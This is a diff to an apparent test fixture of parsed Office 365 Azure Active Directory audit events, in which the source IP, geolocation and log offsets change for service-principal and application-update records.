@@ -11049,7 +10913,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 347893,
+        "log.offset": 347757,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11078,9 +10942,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:31",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11175,20 +11039,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11199,8 +11061,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:36:31.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11215,7 +11077,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 352603,
+        "log.offset": 352465,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11244,9 +11106,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:36:31",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11341,20 +11203,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11365,8 +11225,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11381,7 +11241,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 357313,
+        "log.offset": 357173,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11410,9 +11270,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11484,20 +11344,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11508,8 +11366,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application \u2013 Certificates and secrets management ",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11524,7 +11382,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 360775,
+        "log.offset": 360633,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11553,9 +11411,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11631,20 +11489,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11655,8 +11511,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application \u2013 Certificates and secrets management ",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11671,7 +11527,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 364657,
+        "log.offset": 364513,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11700,9 +11556,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11778,20 +11634,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11802,8 +11656,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11818,7 +11672,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 368539,
+        "log.offset": 368393,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -11847,9 +11701,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -11934,20 +11788,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -11958,8 +11810,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -11974,7 +11826,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 372452,
+        "log.offset": 372304,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12003,9 +11855,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12090,20 +11942,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12114,8 +11964,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:42:45.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12130,7 +11980,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 376365,
+        "log.offset": 376215,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12159,9 +12009,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:42:45",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12246,20 +12096,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12270,8 +12118,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12286,7 +12134,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 380278,
+        "log.offset": 380126,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12315,9 +12163,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12393,20 +12241,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12417,8 +12263,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12433,7 +12279,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 385372,
+        "log.offset": 385218,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12462,9 +12308,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12540,20 +12386,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12564,8 +12408,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12580,7 +12424,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 390466,
+        "log.offset": 390310,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12609,9 +12453,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12687,20 +12531,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12711,8 +12553,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12727,7 +12569,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 395560,
+        "log.offset": 395402,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12756,9 +12598,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12843,20 +12685,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -12867,8 +12707,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -12883,7 +12723,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 399473,
+        "log.offset": 399313,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -12912,9 +12752,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
